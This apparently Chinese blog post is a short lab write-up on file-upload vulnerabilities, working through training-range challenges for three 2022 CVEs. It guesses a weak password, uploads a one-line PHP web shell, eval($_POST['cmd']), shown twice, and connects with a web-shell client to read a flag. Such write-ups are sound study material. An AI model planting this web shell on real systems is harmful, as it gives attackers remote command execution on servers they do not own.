声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!
前言
前些日子学了点文件上传,去春秋云镜文件上传专栏玩玩。
CVE-2022-26965
利用file_content在根目录下生成test.php文件来插入木马
修改后将文件压缩
CVE-2022-28525
eval($_POST['cmd']) @
CVE-2022-30887
打开靶场
需要登录,没有注册入口,忘记密码入口也不能用
网站底部有个作者项目入口
进入之后,翻找一些页面
弹出来一个作者的邮箱,尝试利用去登录,密码试试弱口令
最后试出来是作者的名字mayurik
在此页面可以看到有上传文件操作
构造一句话木马
eval($_POST['cmd']) @
进行上传
可以看到已经上传了
将图片链接复制下来
使用中国蚁剑进行连接
在根目录下可以找到flag
感觉学会代码审计还是挺重要的,要肯花费时间去研究漏洞到底是如何造成。根据当漏洞点一步一步地去推测,审计漏洞代码比单纯的复现能学到东西更多。
关注我们
原文始发于微信公众号(极星信安):文件上传思路学习
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论